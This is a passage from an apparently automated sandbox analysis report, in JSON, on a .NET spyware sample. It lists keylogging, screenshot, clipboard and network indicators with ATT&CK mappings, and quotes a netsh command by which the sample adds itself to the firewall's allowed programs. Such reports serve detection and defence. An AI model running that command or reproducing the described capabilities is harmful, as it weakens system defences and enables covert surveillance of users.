"identifier": "string-96", "type": 2, "relevance": 1, "name": "Found registry key string for installed applications", "description": "\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" (Indicator: \"microsoft\\windows\\currentversion\\uninstall\") in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" (Indicator: \"microsoft\\windows\\currentversion\\uninstall\") in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"OFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" (Indicator: \"microsoft\\windows\\currentversion\\uninstall\") in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"KEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" (Indicator: \"microsoft\\windows\\currentversion\\uninstall\") in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"oftware\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" (Indicator: \"microsoft\\windows\\currentversion\\uninstall\") in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.INI (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"FindFirstFileW\" with parameter C:\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.INI (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.INI (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.INI (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.INI (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.INI (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.INI (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.INI (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"41998025510,6112,3025,,RtlGetNtProductType,NTDLL.dll,\"252:04:08.536\",RX=0,PX=0\" (Indicator: \"RtlGetNtProductType\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-403", "type": 2, "relevance": 1, "name": "Contains ability to register/read input devices (API string)", "description": "Found reference to API \"mouse_event\" (Indicator: \"mouse_event\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"mouse_event\" (Indicator: \"mouse_event\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetAsyncKeyState\" (Indicator: \"GetAsyncKeyState\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"11410038161,5896,104,,GetKeyState,user32.dll,\"252:02:41.391\",RX=0,PX=0\" (Indicator: \"GetKeyState\"; Source: \"00000000-00005756.00000000.65858.00050000.00000004.mdmp\")\n Found reference to API \"GetAsyncKeyState\" (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"14251927809,5896,104,,GetKeyState,user32.dll,\"252:03:42.376\",RX=0,PX=0\" (Indicator: \"GetKeyState\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp\")\n Found reference to API \"84555100806,5896,104,,GetKeyState,user32.dll,\"252:05:32.658\",RX=0,PX=0\" (Indicator: \"GetKeyState\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp\")\n Found reference to API \"155474984062,5896,103,,GetAsyncKeyState,user32.dll,\"252:07:54.604\",RX=0,PX=0\" (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005756.00000002.69706.00050000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"[Back]\" (Indicator: \"[Back]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[tab]\" (Indicator: \"[tab]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[shift]\" (Indicator: \"[shift]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[ctrl]\" (Indicator: \"[ctrl]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[ctrl]\" (Indicator: \"[Ctrl]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[alt]\" (Indicator: \"[alt]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[alt]\" (Indicator: \"[Alt]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[pause]\" (Indicator: \"[pause]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[esc]\" (Indicator: \"[esc]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[end]\" (Indicator: \"[end]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[home]\" (Indicator: \"[home]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[left]\" (Indicator: \"[left]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[right]\" (Indicator: \"[right]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[down]\" (Indicator: \"[down]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[insert]\" (Indicator: \"[insert]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[Delete]\" (Indicator: \"[Delete]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F1]\" (Indicator: \"[F1]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F2]\" (Indicator: \"[F2]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F3]\" (Indicator: \"[F3]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F4]\" (Indicator: \"[F4]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F5]\" (Indicator: \"[F5]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F6]\" (Indicator: \"[F6]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F7]\" (Indicator: \"[F7]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F8]\" (Indicator: \"[F8]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F9]\" (Indicator: \"[F9]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F10]\" (Indicator: \"[F10]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"[F11]\" (Indicator: \"[F11]\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "file/memory contains long string with (Indicator: \"password\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"passwordFormat\" (Indicator: \"password\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"passwordAttemptWindow\" (Indicator: \"password\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"passwordStrengthRegularExpression\" (Indicator: \"password\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-164", "relevance": 1, "name": "Contains ability to capture screen information (Dotnet)", "description": "Observed Namespace \"System.Windows.Forms::Screen\" and MemberReference \"get_PrimaryScreen\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"Microsoft.VisualBasic.Devices::Computer\" and MemberReference \"get_Keyboard\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-113", "relevance": 1, "name": "Contains ability to capture screenshot", "description": "Observed function \"System.Drawing.CopyFromScreen\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-100", "relevance": 1, "name": "Contains ability to gather process details (Dotnet)", "description": "Observed function \"GetProcessesByName\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed function \"GetProcessById\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed function \"get_ProcessName\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-163", "relevance": 1, "name": "Contains ability to collect clipboard information (Dotnet)", "description": "Observed Namespace \"Microsoft.VisualBasic.Devices::Computer\" and MemberReference \"get_Clipboard\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Windows.Forms::Clipboard\" and MemberReference \"GetText\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"microsoft.net/framework/v2.0.50727/\"\n Heuristic match: \"eb\\system.drawing.ni\"\n Pattern match: \"http://www.w3.org/2000/xmlns/\"\n Pattern match: \"http://www.w3.org/xml/1998/namespace\"\n Pattern match: \"http://schemas.microsoft.com/.netconfiguration/v2.0\"\n Pattern match: \"system.web/anonymousidentification\"\n Pattern match: \"system.web/authentication\"\n Pattern match: \"system.web/authorization\"\n Pattern match: \"system.web/browsercaps\"\n Pattern match: \"system.web/clienttarget\"\n Pattern match: \"system.web/compilation\"\n Pattern match: \"system.web/customerrors\"\n Pattern match: \"system.web/deployment\"\n Pattern match: \"system.web/devicefilters\"\n Pattern match: \"system.web/globalization\"\n Pattern match: \"system.web/healthmonitoring\"\n Pattern match: \"system.web/hostingenvironment\"\n Pattern match: \"system.web/httpcookies\"\n Pattern match: \"system.web/httphandlers\"\n Pattern match: \"system.web/httpmodules\"\n Pattern match: \"system.web/httpruntime\"\n Pattern match: \"system.web/identity\"\n Pattern match: \"system.web/machinekey\"\n Pattern match: \"system.web/membership\"\n Pattern match: \"system.web/mobilecontrols\"\n Pattern match: \"system.web/pages\"\n Pattern match: \"system.web/processmodel\"\n Pattern match: \"system.web/profile\"\n Pattern match: \"system.web/protocols\"\n Pattern match: \"system.web/rolemanager\"\n Pattern match: \"system.web/securitypolicy\"\n Pattern match: \"system.web/sessionpagestate\"\n Pattern match: \"system.web/sessionstate\"\n Pattern match: \"system.web/sitemap\"\n Pattern match: \"system.web/trace\"\n Pattern match: \"system.web/trust\"\n Pattern match: \"system.web/urlmappings\"\n Pattern match: \"system.web/webcontrols\"\n Pattern match: \"system.web/webparts\"\n Pattern match: \"system.web/webservices\"\n Pattern match: \"system.web/xhtmlconformance\"\n Pattern match: \"system.web/caching\"\n Pattern match: \"system.web/caching/cache\"\n Pattern match: \"system.web/caching/outputcache\"\n Pattern match: \"system.web/caching/outputcachesettings\"\n Pattern match: \"system.web/caching/sqlcachedependency\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"mscorlib,<IPv4>,,b77a5c561934e089,x86\"\n Potential IP \"<IPv4>\" found in string \"Microsoft.VisualBasic,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Xml,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Configuration,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Web,<IPv4>,,b03f5f7f11d50a3a,x86\"\n Potential IP \"<IPv4>\" found in string \"System.Management,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Runtime.Remoting,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Deployment,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Drawing,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Windows.Forms,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Runtime.Serialization.Formatters.Soap,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"Accessibility,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Security,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Data.SqlXml,<IPv4>,,b77a5c561934e089,MSIL\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-479", "type": 2, "relevance": 1, "name": "References hosts file in file/memory", "description": "Found string \"C:\\WINDOWS\\system32\\drivers\\etc\\hosts\" (Indicator: \"\\system32\\drivers\\etc\\hosts\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \":\\WINDOWS\\system32\\drivers\\etc\\hosts\" (Indicator: \"\\system32\\drivers\\etc\\hosts\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005756)\n \"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; Source: \"00000000-00005756-00000C29-61500370\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d\n Observed JA3 fingerprint: db95a4cb23548a635a1dfebcee9991cb", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-110", "relevance": 1, "name": "Contains ability to provide interface for network protocols (Dotnet)", "description": "Observed namespace \"System.Net.Sockets\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.Net.NetworkInformation\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.Net\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-158", "relevance": 1, "name": "Contains ability to communicate with network (Dotnet)", "description": "Observed Namespace \"System.Net.WebClient\" and MemberReference \".ctor\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadData\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadFile\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-151", "relevance": 1, "name": "Contains ability to communicates via socket (possible C&C communication)", "description": "Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"set_ReceiveTimeout\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Receive\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"C:\\\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" ENABLE\" (UID: 00000000-00005928)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-159", "relevance": 1, "name": "Contains ability to communicate via sockets (Dotnet)", "description": "Observed Namespace \"System.Net.Sockets.TcpClient\" and MemberReference \"Close\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.TcpClient\" and MemberReference \".ctor\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.TcpClient\" and MemberReference \"set_ReceiveBufferSize\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.TcpClient\" and MemberReference \"set_SendBufferSize\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.TcpClient\" and MemberReference \"get_Client\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"set_SendTimeout\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"set_ReceiveTimeout\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.TcpClient\" and MemberReference \"Connect\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Send\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.TcpClient\" and MemberReference \"get_Available\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Poll\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.TcpClient\" and MemberReference \"GetStream\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Receive\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-108", "type": 2, "relevance": 1, "name": "Contains ability to perform encryption (API string)", "description": "file/memory contains long string with (Indicator: \"CryptProtectData\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found reference to API \"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 